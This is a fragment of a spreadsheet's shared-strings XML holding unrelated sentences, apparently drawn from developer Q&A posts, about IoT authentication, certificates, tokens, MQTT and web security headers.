    <t>Following the directions verbatim (http://ms-iot.github.io/content/en-US/win10/samples/PowerShell.htm) I got to the part where I successfully log into the raspberry pi 2 via the default password [p@ssw0rd] and then change the password via the command "net user Administrator [new password]".</t>
  </si>
  <si>
    <t>EDIT 05/09/2018: I've found this blog post, which describes my approach pretty well: Ensure Secure Communication with AWS IoT Core Using the Certificate Vending Machine Reference Application
--
You could take a look at Just-in-Time Provisioning or build your own solution based on Programmatic Provisioning.</t>
  </si>
  <si>
    <t>I am trying to use HTTP APIs mentioned in below link to access my IoT devices and their data: https://docs.internetofthings.ibmcloud.com/swagger/v0002.html#!/Organization_Configuration/get
I am using my 6 digit organization code to access these apis and I have created API Key from IBM Watson to access these apis.</t>
  </si>
  <si>
    <t>If you are using ssl and https just to make sure that the end user on a pi knows that they are, in fact, connected to the server, then you would have a private key on the server and authenticate the public ssl certificate on all of your pi's via your browser or whatever.</t>
  </si>
  <si>
    <t>When you use secure MQTT messaging on ports 8883 or 443, newer client libraries automatically trust the certificate that is presented by Watson IoT Platform.</t>
  </si>
  <si>
    <t>Unfortunately AWS Iot DeviceGateway has header size limitation which restricts Custom Auth token length to 1024 chars currently.</t>
  </si>
  <si>
    <t>Features
Compatible with all Graph API and REST API Calls 
Supports all forms of Facebook authentication: Cookies, OAuth 2.0, Signed Requests 
Samples Applications to get started quickly 
Client authentication tool to get test access tokens
Links
Facebook SDK for .NET
Documentation
Source Code
Facebook Page</t>
  </si>
  <si>
    <t>One for the Cognito Identity Pool and another for the Cognito User.</t>
  </si>
  <si>
    <t>Add Edge device id (or its hostname etc) in leaf device message.</t>
  </si>
  <si>
    <t>The user-agent string is a string in the header of an HTTP request that identifies the browser, version, device, os, and other information about the device from which the request came.</t>
  </si>
  <si>
    <t>Authorize.Net's API for managing and receiving Webhooks</t>
  </si>
  <si>
    <t>Client certificates are X.509 certificates used for TLS/SSL connections.</t>
  </si>
  <si>
    <t>The final HTTP header will be Content-Security-Policy.</t>
  </si>
  <si>
    <t>So if creating shared access policy while creating new IoTHub, please use the REST API Create a new IoT Hub, else use the REST API Update metadata on an existing IoT Hub to add a new one for an existing IoTHub.</t>
  </si>
  <si>
    <t>Also i want to confirm that openssl provide SSL certificate that openssl is using and sending to server?</t>
  </si>
  <si>
    <t>The device will be disconnected after the token
        // expires, and will have to reconnect with a new token.</t>
  </si>
  <si>
    <t>no Unauthorized response) but I get a 426 Upgrade Required response.</t>
  </si>
  <si>
    <t>Are there other ways to let an IoT hub client-device provision itself without having been preprogrammed with a SAS, token, or other unique identifier?</t>
  </si>
  <si>
    <t>There are many ways I could go about encrypting this data, but I would like to know what the most idiomatic way to do this within an Azure IoT Edge module is.</t>
  </si>
  <si>
    <t>I deleted all the devices that were registered in the Azure IOT Hub.</t>
  </si>
  <si>
    <t>I have successfully provisioned Device, I am using X509 certs for provisioning and its working fine.</t>
  </si>
  <si>
    <t>I was following this tutorial on 'Azure IoT hub using the X.509 Certificate Authentication'.</t>
  </si>
  <si>
    <t>I was able to get the self-signed cert and has the private key but an exception is being thrown at 'SendEventAsync'.</t>
  </si>
  <si>
    <t>I keep getting an error message that "The topic does not match the authorized rule".</t>
  </si>
  <si>
    <t>I am currently looking for a way to revoke the device session of a device that is connected to the Azure Iot Hub.</t>
  </si>
  <si>
    <t>---&gt; 
Microsoft.Azure.Devices.Client.Exceptions.IotHubException: Put token failed.</t>
  </si>
  <si>
    <t>Is there any max numbers of device registering by Azure IoT Hub?</t>
  </si>
  <si>
    <t>The hack I wrote uses nodejs at the server, and connects DAQ to the server using TCP sockets using the "net" module of nodejs and connects the server to the HTML page using socket.io.</t>
  </si>
  <si>
    <t>2) For the GetStreamUri to work, the client needs to know a profile token for this specific stream.</t>
  </si>
  <si>
    <t>In your function  I dont see a response if the message is not recognized, you should had a response for debug.</t>
  </si>
  <si>
    <t>Sending downstream messages (messages to devices) requires that you specify the FCM server key.</t>
  </si>
  <si>
    <t>List policies attached to a certificate
I assume you have 1 policy per certificate.</t>
  </si>
  <si>
    <t>For security - devices may only publish to MQTT topics prefixed with their device namespace.</t>
  </si>
  <si>
    <t>Choose AMQP or MQTT except for the device only support HTTPs.</t>
  </si>
  <si>
    <t>Azure IoT Edge doesn't currently support downstream devices to connect using client certificates (mutual authentication).</t>
  </si>
  <si>
    <t>So at the first time you want to connect, you should attach a IOT policy to this identity.</t>
  </si>
  <si>
    <t>For the C client SDK, the certificate is located under the folder "\c\certs" under the root of the repo.</t>
  </si>
  <si>
    <t>The key point about IoT Hub is the interoperability it provides between some common protocols used by IoT devices: AMQP, MQTT and HTTPS.</t>
  </si>
  <si>
    <t>Remember that all clients connecting to a broker must have a unique client id.</t>
  </si>
  <si>
    <t>This exception is thrown when a particular security provider is requested but is not available in the environment.</t>
  </si>
  <si>
    <t>See also:
http://en.wikipedia.org/wiki/Cryptographic_nonce
https://html.spec.whatwg.org/multipage/indices.html#attributes-3:attr-link-nonce
http://codex.wordpress.org/WordPress_Nonces</t>
  </si>
  <si>
    <t>This code is similar to 401 (Unauthorized), but indicates that the client must first authenticate itself with the proxy.</t>
  </si>
  <si>
    <t>This excerpt and description provided by: http://en.wikipedia.org/wiki/Security_Token_Service</t>
  </si>
  <si>
    <t>http://en.wikipedia.org/wiki/Phishing
https://www.securelist.com/en/threats/spam?chapter=85</t>
  </si>
  <si>
    <t>Tamper Data is a Firefox addon used to view and modify HTTP/HTTPS headers and post parameters.</t>
  </si>
  <si>
    <t>Only the UTF-8 character encoding is supported for both requests and responses.</t>
  </si>
  <si>
    <t>For more information about .net-security see the docs at Security in the .NET Framework</t>
  </si>
  <si>
    <t>Browsers use the Same-origin policy (https://en.wikipedia.org/wiki/Same-origin_policy) to block frontend JavaScript code from accessing  responses to cross-origin requests.</t>
  </si>
  <si>
    <t>The following are steps how to obtain a sas token for authorization header needed for REST Api calls:
Get the Access Token from your Azure IoT Central application.</t>
  </si>
  <si>
    <t>When a user is signed in, you get an OAuth token for making API requests on their behalf, which you can use to better understand your user, connect them with their friends, and create a richer and more engaging experience.</t>
  </si>
  <si>
    <t>Enter the idScope, globalEndpoint and as the leafPublicPem I enter the Base64 String 
Also as the leafPrivateKey I enter the Private Key of my intermediate-ca which create/sign my X509-Device-certifivate
As transport-protocol i will use MQTT
If I run this sample I get the following error(s)
Starting...
Beginning setup.</t>
  </si>
  <si>
    <t>Whereas built-in policies are predefined in the Azure AD B2C portal for the most common identity tasks, custom policies can be fully edited by an identity developer to complete a near unlimited number of tasks.</t>
  </si>
  <si>
    <t>Once the devices are registered, they will starting sending json messages to a few MQTT topics.</t>
  </si>
  <si>
    <t>Wikipedia about "doc"
http://en.wikipedia.org/wiki/DOC_%28computing%29
Decrypted file format:
http://sc.openoffice.org/compdocfileformat.pdf</t>
  </si>
  <si>
    <t>See: https://github.com/OP-TEE/optee_os/blob/master/documentation/rpi3.md
The build will be improved further..
Btw, although the Pi3 implements the ARM V8a exception states the chip is not secure.</t>
  </si>
  <si>
    <t>Right now though, unfortunately, the Azure portal (or the Azure CLI) does not have support for fetching module credentials which you'd need to build your connection string to connect to Edge Hub.</t>
  </si>
  <si>
    <t>Whitelists are used for software (authorized to run or not), E-mail senders, file types (authorized to upload, etc), IP addresses (authorized to connect), network ports (opened) and the like.</t>
  </si>
  <si>
    <t>But it defines the new PRA identity to validate, and defines new sender policy record tags that specify whether a policy covers MAIL FROM (called MFROM by Sender ID), PRA, or both.</t>
  </si>
  <si>
    <t>Content security policy (CSP) defines an HTTP-header which whitelists trusted sources for JavaScript files while disallowing execution of inline JavaScript in the HTML document.</t>
  </si>
  <si>
    <t>I have a running project that follows this Azure IOT SDK tutorial (complete with same hardware):  https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-arduino-huzzah-esp8266-get-started
D2C messages are being sent from device and acknowledged by azure.</t>
  </si>
  <si>
    <t>I want to get certificate_id so that I can active or deactive device using boto3 iot function
response = client.update_certificate(
    certificateId='string',
    newStatus='ACTIVE'|'INACTIVE'
)
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/iot.html#IoT.Client.update_certificate</t>
  </si>
  <si>
    <t>Therefore, in order to get to the Linux Login prompt I respond to each DO request with a WONT, for example;
When receiving the following DO request (FD indicates a DO for option 18)
I respond with a WONT response (indicated by FC)
Similarly if I had received a WILL request (FB)
FF FB 18
I would return a DONT (FE)
FF FE 18
I hope this helps.</t>
  </si>
  <si>
    <t>You have two main options on how you use this token to connect the device to Watson IoT Platform at orgId.messaging.internetofthings.ibmcloud.com:
Port 1883 (this is non-TLS)
Port 8883/443 (this is TLS)
In both cases the password is used to authenticate your device - but only in the second is the on-the-wire traffic encrypted (which is why we strongly recommend using TLS/port 8883/443 where possible).</t>
  </si>
  <si>
    <t>As the documentation for the esp32 says "here are three ways to establish a secure connection using the WiFiClientSecure class: using a root certificate authority (CA) cert, using a root CA cert plus a client cert and key, and using a pre-shared key (PSK)."</t>
  </si>
  <si>
    <t>HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents are to interact with it using only secure HTTPS connections.</t>
  </si>
  <si>
    <t>Resources:
Introducing Content Security Policy
Mozilla Developer Network's short introduction, which includes a basic description of the policy as well as the goals of the policy.</t>
  </si>
  <si>
    <t>Minimal configuration at the application side
Admin Console for managing users, roles, role mappings, applications, user sessions, allowed CORS web origins, and OAuth clients.</t>
  </si>
  <si>
    <t>Further, within an appropriate surrounding context, all accepted input must be valid Java code (JShell will automatically provide that surrounding context -- the "wrapping").</t>
  </si>
  <si>
    <t>I create a access token via Active Directory as seen below and this works and generates the token correctly.</t>
  </si>
  <si>
    <t>Simcom SIM800 GPRS modules supports HTTPS, but in tk102-2 the module is Siemens MC55/Siemens MC56 or Simcom 300/ Simcom 340.IoT Hub allows devices to use the following protocols for device-side communications:MQTT/MQTT over WebSockets,AMQP/AMQP over WebSockets,HTTPS, please refer to choose a communication protocol.</t>
  </si>
  <si>
    <t>In other words, the Event Hub-compatible endpoint of the IoT Hub doesn't have a write permission.</t>
  </si>
  <si>
    <t>AFS is a Kerberos-authenticated distributed file system that uses Kerberos for authentication and supports client-transparent location independence and client-side caching.</t>
  </si>
  <si>
    <t>Please check your username/password
In analytics/bin/wso2server.sh :
[2017-04-10 15:16:40,768] [IoT-Analytics] ERROR {org.wso2.carbon.device.mgt.input.adapter.mqtt.util.MQTTAdapterListener} -  MQTT Exception occurred when starting listener
Nom d'utilisateur ou mot de passe incorrect (4)
        at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:28)
        at org.eclipse.paho.client.mqttv3.internal.ClientState.notifyReceivedAck(ClientState.java:885)
        at org.eclipse.paho.client.mqttv3.internal.CommsReceiver.run(CommsReceiver.java:118)
        at java.lang.Thread.run(Thread.java:745)
Thanks</t>
  </si>
  <si>
    <t>The input of client connection I need to use requires these parameters:
Cert format: pem
Authentication Format: x509</t>
  </si>
  <si>
    <t>I created an Azure IoT device with SSL authentication, i have created the certification in the back end, got the primary thumbprint and the second one.</t>
  </si>
  <si>
    <t>Relying party consumes these tokens authenticate the end user and communicate with resource server using these tokens.</t>
  </si>
  <si>
    <t>I am using BearSSL on ESP8266 with certificate and key which I generated with this script https://github.com/esp8266/Arduino/blob/master/libraries/ESP8266WiFi/examples/WiFiHTTPSServer/make-self-signed-cert.sh.</t>
  </si>
  <si>
    <t>Inside HTTPS, you could use Basic Auth or create two key pairs and use signed requests between the two PHP services.</t>
  </si>
  <si>
    <t>You'll want to create some flavor of message broker that acts as an intermediary.</t>
  </si>
  <si>
    <t>The value of iot:ClientId is the client Id you specify when creating the mqtt connection.</t>
  </si>
  <si>
    <t>Read more:
http://en.wikipedia.org/wiki/Login
http://en.wikipedia.org/wiki/Login_session</t>
  </si>
  <si>
    <t>The OAuth 2.0 Framework and Bearer Token Usage were published in October 2012.</t>
  </si>
  <si>
    <t>I was wondering if anyone has the idea of the best practices on AWS IoT regarding the handling of policies, for example, we could have two different cases: 
Case 1:
Call a lambda(identity-id as param) which creates a policy on the fly and then attach the policy to the identity id.</t>
  </si>
  <si>
    <t>I have the correct credentials and information in the header file and also have the correct files, which are: xxx-certificate.pem.crt, xxx-private.pem.key, and root_certificate.pem in a directory, "/root/certs/", when I SSH into the Arduino Yun.</t>
  </si>
  <si>
    <t>The first time the device try to connect, AWS detects the certs were created by using the rootCA of the user and you can catch this event with IoT Rule engine listen to a topic and invoking a Lambda.</t>
  </si>
  <si>
    <t>Browsers are the only runtimes that enforce the same-origin policy.</t>
  </si>
  <si>
    <t>Source: I work on a 100% javascript application that uses both authenticated and unauthenticated Cognito identities.</t>
  </si>
  <si>
    <t>Please try:
curl -X GET --header 'Accept: application/json' 'https://ServerIP:9443/api/device-mgt/v1.0/events/last-known/deviceType/deviceId' -H "Authorization: Bearer token"</t>
  </si>
  <si>
    <t>More information at http://en.wikipedia.org/wiki/Secure_Digital</t>
  </si>
  <si>
    <t>I could understand that it is not different than normal OpenSSL certificate, but i stumbled on the PEM file which AWS creates is something different.</t>
  </si>
  <si>
    <t>I see that user name is created from the token attribute in the request, but I dont know how to support a right one, i.e.</t>
  </si>
  <si>
    <t>I created a thing in the AWS IoT console, assigned certificate and policies.</t>
  </si>
  <si>
    <t>Currently am generating sas token based on shared keyname and primary key of azure dps.</t>
  </si>
  <si>
    <t>In my case, first ESP8266 is sending such HTTPS request to AWS API Gateway and gets JSON response with newly generated deviceCertificate-keyPair.</t>
  </si>
  <si>
    <t>The library uses https, however the contents of the message is not encrypted, so if you're super-sceptical, just encrypt it before sending.</t>
  </si>
  <si>
    <t>You can find this
  certificate in the Azure-iot-sdk-c repository.</t>
  </si>
  <si>
    <t>Note, that this approach requires to use a Bearer Token for Authorization header.</t>
  </si>
  <si>
    <t>A .NET API for managing and authenticating users in ASP.NET applications.</t>
  </si>
  <si>
    <t>A module of the Authorize.Net Accept suite of tools.</t>
  </si>
  <si>
    <t>Source: http://en.wikipedia.org/wiki/Integrated_Windows_Authentication</t>
  </si>
  <si>
    <t>The Content-Encoding header is always set, but some proxies will strip this out.</t>
  </si>
  <si>
    <t>let JavaScript set it as a cookie so that it's available by request.getCookies() in subsequent requests.</t>
  </si>
  <si>
    <t>If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user agent SHOULD present the enclosed representation to the user, since it usually contains relevant diagnostic information.</t>
  </si>
  <si>
    <t>Capabilities
Internet (Client) 
Internet (Client &amp; Server) 
Private Networks (Client &amp; Server)
are set in the app manifest.</t>
  </si>
  <si>
    <t>The topic I'm posting to is by this line in my code:
In Node-RED I have an IOT-in node looking at Device Status and using the Bluemix service for auth.</t>
  </si>
  <si>
    <t>I am trying to develop a client program that creates a device identity thanks to azure .</t>
  </si>
  <si>
    <t>I need to to get the "shared access policy" - 'iothubowner' 's primarykey value and use it for the setup of another resource downstream.</t>
  </si>
  <si>
    <t>(didn't find that in the aws-iot-device-sdk, have only seen aws cli examples)
If a device (with the client certificate) publishes a message, how could I use the associated thing and its attributes?</t>
  </si>
  <si>
    <t>As for now in order to make SSL request using  you need to provide SSL fingerprint.</t>
  </si>
  <si>
    <t>I used Python for both the IBM Bluemix and AWS to connect my Pi to IoT and then establish the subscriber and exchange messages using MQTT gateway.</t>
  </si>
  <si>
    <t>The thing is setup with a certificate and an "iot:*" policy which gives it full IoT access.</t>
  </si>
  <si>
    <t>To this question, I'm thinking that if I can disconnect the clients from AP itself using deAuth() once the messages are shared then I can allow other Clients to connect.</t>
  </si>
  <si>
    <t>I get below error while trying  to connect to IBM Watson internet of things platform using client certs &amp; mosquitto client.</t>
  </si>
  <si>
    <t>I'm interested by getting the public IP address of a connected device on Azure IoT Hub.</t>
  </si>
  <si>
    <t>Run an MQTT broker proxy in the private VPC and route MQTT packets to the mqtt.googleapis.com .</t>
  </si>
  <si>
    <t>It is showing that
"{deviceName}-public.pem file and include this value as your Client Cert.</t>
  </si>
  <si>
    <t>However, when I try to connect with my existing IoThub from my UWP using the same code, the same certificate and from the same device, I keep getting non specific exception Message = "Exception from HRESULT: 0x80072F0C".</t>
  </si>
  <si>
    <t>I want to use the azure-iot-sdk-csharp to provision a linux based device on the azure iot dps using TPM as authentification mechanism.</t>
  </si>
  <si>
    <t>I have azure Iot hub with connection details like address, remote_username, remote_password which my device uses to connect to the IoT hub.</t>
  </si>
  <si>
    <t>I see post related to spark mqtt integration, however, AWS IoT uses certificate for authentication which i don't find in those articles.</t>
  </si>
  <si>
    <t>IBM cloud connection log gave the message: Topic does not match authorized rule.</t>
  </si>
  <si>
    <t>I correctly assembled the broker:
And the client: 
And published values to this topic:
iot-2/evt/&lt;eventName&gt;/fmt/json Payload: {"db",56}
With the authentication:
username: use-token-auth Password: 
And all OK.</t>
  </si>
  <si>
    <t>What is wierd is that the server is not explicitly marking the response as being chunk-encoded (This is usually done via the  header).</t>
  </si>
  <si>
    <t>the reaseon why you get an error is either because :
your server is not setup for https request
if you request google.com/search?=whatever, /search doesn't exist on your server.</t>
  </si>
  <si>
    <t>The bindings for crypto_aead_chacha20poly1305_encrypt, crypto_aead_chacha20poly1305_decrypt, and crypto_stream_chacha20_xor are available on a fork of pysodium at https://github.com/iachievedit/pysodium until a pull request is submitted and accepted.</t>
  </si>
  <si>
    <t>This is the approach taken in the MyDriving sample solution here that allows users to register their phones as devices connected to an IoT hub.</t>
  </si>
  <si>
    <t>The TLS client certificates would be sent/used as part of your  call, not as part of the HTTP request.</t>
  </si>
  <si>
    <t>The TLS handshake (and exchange/validation of client and server certificates) happens before any HTTP message is sent.</t>
  </si>
  <si>
    <t>FYI - I believe the change in functionality can be traced to this security update:
https://launchpad.net/ubuntu/+source/python2.7/2.7.6-8ubuntu0.3:</t>
  </si>
  <si>
    <t>Here is a link to the issue: https://github.com/ms-iot/security/issues/11
The SAS token expires immediately.</t>
  </si>
  <si>
    <t>You're code seems fine, as you're saying the documentation supports http and https in the requests.</t>
  </si>
  <si>
    <t>Are you able to use your credentials to run the AndroidPubSubSample program and are you able to successfully subscribe and publish messages?</t>
  </si>
  <si>
    <t>In IAM you would also need to give proper IoT permissions so that you app may connect to IoT and do publish/subscribes.</t>
  </si>
  <si>
    <t>Given that you are only doing a tutorial, you can use a policy like this:
Don't forget to attach this policy to your certificate.</t>
  </si>
  <si>
    <t>You can pass additional parameters in the POST request (cert, data etc.)</t>
  </si>
  <si>
    <t>I think you should be able to uniquely identify your devices using clientId property of the MQTT message.</t>
  </si>
  <si>
    <t>Because this permission is checked on every delivery, it can be used to revoke permissions to clients that are currently subscribed to a topic.</t>
  </si>
  <si>
    <t>This enables verifiable TLS connections between modules and leaf devices (for gateway scenarios).</t>
  </si>
  <si>
    <t>Reliability features in the SDKs
Security tokens in IoT Hub</t>
  </si>
  <si>
    <t>You can get thing's certificate and policy attached to that certificate by running the following two commands of AWS CLI:
.</t>
  </si>
  <si>
    <t>The monitored messages will be shown in OUTPUT &gt; Azure IoT Toolkit view.</t>
  </si>
  <si>
    <t>The Client ID is also used for Client Takeover which causes your problem
Usually, a disconnected client tries to reconnect.</t>
  </si>
  <si>
    <t>AWS IoT policy should allow the same operations and you need to associate your cognito identity with this policy.</t>
  </si>
  <si>
    <t>When registering a device with DPS, use the global endpoint - global.azure-devices-provisioning.net.</t>
  </si>
  <si>
    <t>Instead it uses mutual TLS authentication which requires configuring certificates and keys for the authentication to the message broker.</t>
  </si>
  <si>
    <t>You can edit the file, go to function New-CACertsDevice() in the param give $signingCertSubject as the name of intermediate certificate 1 which will be "Azure IoT CA TestOnly Intermediate 1 CA"</t>
  </si>
  <si>
    <t>Assuming you are using the MQTT bridge to connect to Cloud IoT Core, once a device is authenticated through the gateway, the gateway can publish a message to the  topic for the authenticated device to enable communication.</t>
  </si>
  <si>
    <t>HTTP vs HTTPs
Lastly, are you sure that the API supports (plain, unencrypted) HTTP as well as HTTPs?</t>
  </si>
  <si>
    <t>Because this permission is checked on every delivery, it can
  be used to revoke permissions to clients that are currently subscribed
  to a topic.</t>
  </si>
  <si>
    <t>If a device is capable of connecting directly to IoT hub there is little reason to use an opaque gateway.</t>
  </si>
  <si>
    <t>SSLSocket is the name of a class from the Java Secure Sockets Extension (JSSE), which implements TLS (Transport Layer Security) and SSL (Secure Sockets Layer).</t>
  </si>
  <si>
    <t>For developing client applications that request data from an existing Google Drive account for an authorized user</t>
  </si>
  <si>
    <t>The message should contain payload(what use will receive) and unique device token that was sent to the server beforehand.</t>
  </si>
  <si>
    <t>More information can be found here :
https://github.com/benedmunds/CodeIgniter-Ion-Auth</t>
  </si>
  <si>
    <t>This method uses HTTP requests and sends the credentials to server when making a request.</t>
  </si>
  <si>
    <t>Any policy specified on the request object is respected unless the sessions policy is more restrictive.</t>
  </si>
  <si>
    <t>&lt;c:if test="${user != null}"&gt;
  &lt;p&gt;Welcome, ${user.name}&lt;/p&gt;
&lt;/c:if&gt;
If the login fails, the message is available by ${message} in EL in the current request only.</t>
  </si>
  <si>
    <t>For new users especially, it is recommended to use unhandled exceptions, as they are extremely informative, helpful and secure.</t>
  </si>
  <si>
    <t>This protocol assumes that it is run over a secure channel, such as SSH, that the server has already authenticated the client, and that the identity of the client user is available to the protocol.</t>
  </si>
  <si>
    <t>A client must simply use a valid client ID and access the permitted topic space.</t>
  </si>
  <si>
    <t>In order to enable Bluetooth I had to call the following, to bypass requesting the permission from the user:
However I then got a SecurityException when scanning: 
java.lang.SecurityException: Need ACCESS_COARSE_LOCATION or ACCESS_FINE_LOCATION permission to get scan results
Using Vysor, I got around this by requesting the permissions and accepting the permission with the following request:
Is there a way to accept the permission without requiring the use of the screen?</t>
  </si>
  <si>
    <t>Example Link:
https://github.com/androidthings/drivers-samples/blob/master/bmx280/src/main/java/com/example/androidthings/driversamples/TemperatureActivity.java
It shows a exception:
ComponentInfo{com.kmk.test/com.kmk.test.MainActivity}:
java.lang.SecurityException: Caller lacks required permission
com.google.android.things.permission.MANAGE_SENSOR_DRIVERS
But I have added the permission in manifests.</t>
  </si>
  <si>
    <t>in order to test the whole stuff you can also use curl command (available on Linux, don't know on other OSs) with this type of syntax:
curl -H "Content-type: application/json" -X POST http://localhost:5000/power/ -d '{"deviceid": "0", "pass": "password", "time": "60", "power": "on"}'</t>
  </si>
  <si>
    <t>The command to attach a policy to a cognito user is :
You can find your cognito user id in : 
Cognito &gt; Manager Federated Identities &gt; choose your identity pool &gt; identity browser &gt; and find your identity ID
I use this policy for testing purpose.</t>
  </si>
  <si>
    <t>I have no immediate idea about the certificate issue but in regards to the routing from leaf devices to a module this config should work:
The clue is  which filters out all messages which are sent by other modules on the Edge device itself and only routes messages from the leafs</t>
  </si>
  <si>
    <t>A preflight is an HTTP OPTIONS request that browsers (automatically on their own) send to servers before trying certain kinds of cross-origin requests  in order to determine if a server has opted-in to receiving those kinds of requests.</t>
  </si>
  <si>
    <t>Security Switch enables various ASP.NET applications to automatically switch requests for pages/resources between the HTTP and HTTPS protocols without the need to write absolute URLs in HTML markup.</t>
  </si>
  <si>
    <t>Based on the documentation, I understand how to create IoT things and also how to create authenticated users using AWS IoT.</t>
  </si>
  <si>
    <t xml:space="preserve">
invalid_grant: Invalid JWT: Token must be a short-lived token (60 minutes) and in a reasonable timeframe.</t>
  </si>
  <si>
    <t>here the question is after receiving message How can I check the received message is from the registered device/gateway?.</t>
  </si>
  <si>
    <t>You can use cli, read : https://ravendb.net/docs/article-page/4.1/Csharp/server/configuration/command-line-arguments
Example:
cd ~/RavenDB/Server
./Raven.Server --Security.UnsecuredAccessAllowed=PublicNetwork --ServerUrl=http://0.0.0.0:8080 --PublicServerUrl=http://10.0.0.90:8080 --Setup.Mode="None" --DataDir=/mnt/ExternalDisk/RavenDB
As a side note: I do recommend to set "DataDir" to external mounted USB disk, rather then using the default SD card data path, if this is your case.</t>
  </si>
  <si>
    <t>Devices are only able to publish when the server is up so I should be able to always start with a single gateway registered for the server on IoT, no devices associated with the gateway and create new devices as they contact the server.</t>
  </si>
  <si>
    <t>Last thing, if you're using the "login" command, you don't need to specify the connectionstring again in subsequent commands (except to receive messages sent by devices, since this is done on the event hubs endpoint).</t>
  </si>
  <si>
    <t>Cryptographic Message Syntax is a format for signing, encrypting, authenticating and hashing arbitrary messages.</t>
  </si>
  <si>
    <t>Useful links
Wikipedia reference 
Native JavaScript Equivalents of jQuery Methods 
MDN JavaScript Reference
W3C DOM Core, HTML, events and CSS compatibility tables from https://www.quirksmode.org/
JSLint code quality tool by Douglas Crockford (and JSHint, a community-driven branch of the original)
Code minifiers/obfuscators: /packer/, YUI Compressor, Google Closure Compiler, UglifyJS
Code formatter/deobfuscator: JSBeautifier
Idioms and Gotchas: Rounding, Date Object, Number Object, Scope Chain
JavaScript Garden
comp.lang.javascript FAQ: Very extensive guide on JavaScript quirks created by Usenet's comp.lang.javascript
ECMA 262-5 Online: HTML version of the ECMAScript 5 specification.</t>
  </si>
  <si>
    <t>Error: Time:Fri May 24 10:01:09 2019 File:/usr/sdk/src/c/iothub_client/src/iothub_client_core_ll.c Func:retrieve_edge_environment_variabes Line:191 Environment IOTEDGE_AUTHSCHEME not set
Error: Time:Fri May 24 10:01:09 2019 File:/usr/sdk/src/c/iothub_client/src/iothub_client_core_ll.c Func:IoTHubClientCore_LL_CreateFromEnvironment Line:1572 retrieve_edge_environment_variabes failed
Error: Time:Fri May 24 10:01:09 2019 File:/usr/sdk/src/c/iothub_client/src/iothub_client_core.c Func:create_iothub_instance Line:941 Failure creating iothub handle
Unexpected error IoTHubClient.create_from_environment, IoTHubClientResult.ERROR from IoTHub</t>
  </si>
  <si>
    <t>The PDP is part of the architecture
In XACML the Policy Decision Point (PDP) is the core engine used to evaluate incoming authorization requests against known policies in order to decide whether a request will result in a Deny or Permit, e.g.</t>
  </si>
  <si>
    <t>You should create one certificate for each device and attach a policy to that certificate.</t>
  </si>
  <si>
    <t>I don't know if it is exactly what you are looking for, but if you are making your appliance web-only UI (instead of a desktop-login based device), you might want to look into using OpenWRT instead of the regular desktop OS, and make a few modifications to the web front end suit your needs:
http://wiki.openwrt.org/toh/raspberry_pi
And for setting LAMP on top of OpenWRT:
http://wiki.openwrt.org/doc/howto/lamp</t>
  </si>
  <si>
    <t>Device part
Raspberry Pi 3 has Windows IoT Core installed
Messages are sent and recieved on both Hub and Device ends successfully
(verified with Device Explorer and IoT hub dashboard)
2.</t>
  </si>
  <si>
    <t>NOTE:client id is nothing but the identity id of user
The iot policy was to be created in the AWS IOT CORE to connect and publish</t>
  </si>
  <si>
    <t>For more information on Microsoft Access, see
http://en.wikipedia.org/wiki/Microsoft_Access
.</t>
  </si>
  <si>
    <t>I have not been able to create the proper token for IoT Central.</t>
  </si>
  <si>
    <t>so each time after certificate created i need to manually attach policy with certificate.</t>
  </si>
  <si>
    <t xml:space="preserve"> in decimal is probably a representation of 0xC0 (see http://en.wikipedia.org/wiki/Signed_number_representations).</t>
  </si>
  <si>
    <t>This was caused by me starting over again on the wizard, generating cert &amp; key, loading cert &amp; key again.</t>
  </si>
  <si>
    <t>"try re-generating an access token from the app console at dropbox.com.")</t>
  </si>
  <si>
    <t>It only supports the following topics:
And Event Hub can't specify device id too.</t>
  </si>
  <si>
    <t>Lite exposes Messages, Folders, Files, and WebHooks.</t>
  </si>
  <si>
    <t>The device is connected to our system and we're trying to use our web hooks functionality which can relay an event to a HTTP endpoint with preconfigured headers and format but it can't execute the code to get a temporary SAS token.</t>
  </si>
  <si>
    <t>I was wondering if there was some way to ask the secure daemon to encrypt data, or if there was some other idiomatic solution specific to the iot edge runtime.</t>
  </si>
  <si>
    <t>I've created an Azure IoT Central solution, where I successfully registered an IoT device.</t>
  </si>
  <si>
    <t>they don't write in the CORS header access-control-allow-origin), so your JS client can't access it from within the browser.</t>
  </si>
  <si>
    <t>Non invasive current sensor needs to be wrapped around live or neutral wire only, not both.</t>
  </si>
  <si>
    <t>Check here for credentials and authentication:
https://console.bluemix.net/docs/services/IoT/applications/mqtt.html#mqtt
Command should look like:</t>
  </si>
  <si>
    <t>In an HTTP context, it is usually stored in a cookie and sent to the server on every request.</t>
  </si>
  <si>
    <t>Hackage page: http://hackage.haskell.org/package/hoopl</t>
  </si>
  <si>
    <t>Although Ebean doesn't have a EntityManager it DOES have a Persistence Context (like
JPA) and by default in Ebean the persistence context is transaction scoped and
automatically managed.</t>
  </si>
  <si>
    <t>Now the matter is like, after booting my esp8266, I successfully auto provisioned my device by created it's thing, created device certificates and keyPair[public-private] attached with specific thingType and Policy by Lambda functions.</t>
  </si>
  <si>
    <t>a
dynamic port forwarding proxy)
execute a callback when a request matches an expectation, allowing
the response to be created dynamically
verify requests have been sent (i.e.</t>
  </si>
  <si>
    <t>This header is used for debugging, statistics, and generating location-dependent content and by design it exposes privacy sensitive information, such as the IP address of the client.</t>
  </si>
  <si>
    <t>First, the web server can include the character encoding or  in the Hypertext Transfer Protocol (http) Content-Type header, which would typically look like this:
This method gives the HTTP server a convenient way to alter document's encoding according to content negotiation; certain HTTP server software can do it, for example Apache with the module mod_charset_lite.</t>
  </si>
  <si>
    <t>When I use  and following code to play new audio
Exception with "Access violation message" is thrown.</t>
  </si>
  <si>
    <t>[MalformedPolicyException: Policy document is Malformed]
message: 'Policy document is Malformed',
code: 'MalformedPolicyException',
  etc
I have tried , ./mypolicy.json (after copying json file in the script's folder) etc.</t>
  </si>
  <si>
    <t>Certificate policies must be detached before deletion
While deleting policy i got this error =&gt;
Failed to delete policy.</t>
  </si>
  <si>
    <t>Is this valid/supported, or do we need to design our applications to ensure that the second HTTP request is not made until the first request is completed?</t>
  </si>
  <si>
    <t>SELECT * FROM 'acme/temp'
All policy and trust policy are correct , yet it does not fire rule.</t>
  </si>
  <si>
